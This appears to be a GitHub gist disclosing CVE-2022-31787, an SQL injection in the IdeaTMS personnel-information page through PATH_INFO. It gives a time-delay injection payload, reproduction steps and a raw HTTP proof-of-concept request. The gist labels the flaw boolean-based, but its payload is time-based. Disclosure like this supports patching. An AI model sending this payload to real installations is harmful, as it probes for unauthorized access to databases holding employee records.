Skip to content

Instantly share code, notes, and snippets.

Show Gist options
  • Save RNPG/ef10c0acceb650d43625a77d3472dd84 to your computer and use it in GitHub Desktop.
Save RNPG/ef10c0acceb650d43625a77d3472dd84 to your computer and use it in GitHub Desktop.
Vulnerability Type: SQL Injection Vulnerability (Boolean-Based Blind)
Vendor of Product: Ideaco.ir
Affected Product Code Base: IdeaTMS
Product Version: 2022
Description: IdeaTMS allows SQL Injection via the PATH_INFO
Attack Vectors: Attacker should inject malicious payload into PATH_INFO
Attack Type: Remote
Payload: zsuuiI8Y'%3b%20waitfor%20delay%20'0:0:20'%20--%20
Assigned CVE-ID: CVE-2022-31787
Discoverer: Mohammad Reza Ismaeli Taba, Raspina Net Pars Group (RNPG Ltd.)
Steps To Reproduce
1. Browse the following page: https://<target.xyz>/IdeaWeb/PersonnelInfo/InfoDetails/[PATH_INFO]
2. Insert the malicious query as the value in PATH_INFO
Example: https://<target.xyz>/IdeaWeb/PersonnelInfo/InfoDetails/zsuuiI8Y'%3b%20waitfor%20delay%20'0:0:20'%20--%20
#PoC
GET /IdeaWeb/PersonnelInfo/InfoDetails/zsuuiI8Y'%3b%20waitfor%20delay%20'0:0:20'%20--%20 HTTP/1.1
Host: <address in which IdeaTMS is set up>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment